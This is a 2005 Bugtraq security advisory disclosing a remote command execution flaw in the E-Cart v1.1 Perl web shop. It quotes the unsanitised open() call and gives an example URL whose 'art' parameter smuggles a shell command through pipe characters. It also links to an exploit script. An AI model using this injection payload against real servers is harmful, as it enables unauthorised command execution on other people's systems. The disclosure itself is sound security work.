[38556] in bugtraq
E-Cart v1.1 Remote Command Execution
daemon@ATHENA.MIT.EDU (Nicolas Montoza)
Sat Apr 23 16:29:36 2005
Message-ID: <d5a0834f05042310241d92ba65@mail.gmail.com>
Date: Sat, 23 Apr 2005 14:24:29 -0300
From: Nicolas Montoza <xonico@gmail.com>
Reply-To: Nicolas Montoza <xonico@gmail.com>
To: bugtraq@securityfocus.com, news@securiteam.com, bugs@securitytracker.com,
submissions@packetstormsecurity.org, vuln@secunia.com
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
============================================================
Title: E-Cart v1.1 Remote Command Execution
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 20/04/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: <= E-Cart 2004 v1.1
Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi
============================================================
============================================================
*Summary
E-Cart is a mod of WepApp written in Perl. It is WebShop.
============================================================
*Problem Description:
The bug is in the file index.cgi where the variable art that is put
under "open()", does
not have a control of data, allowing to the attacker to execute any
type of commands.
Vulnerable code
---------------
sub viewart {
&cartfooter;
open(DATA, "$catdir/$info{'cat'}/$info{'art'}"); hold(DATA);
chomp(@data = <DATA>); release(DATA); close(DATA);
...
...
...
============================================================
*Example:
http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|
============================================================
*Xpl:
http://www.soulblack.com.ar/repo/tools/ecart-xpl.php
============================================================
*Fix:
Contact the Vendor.
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar
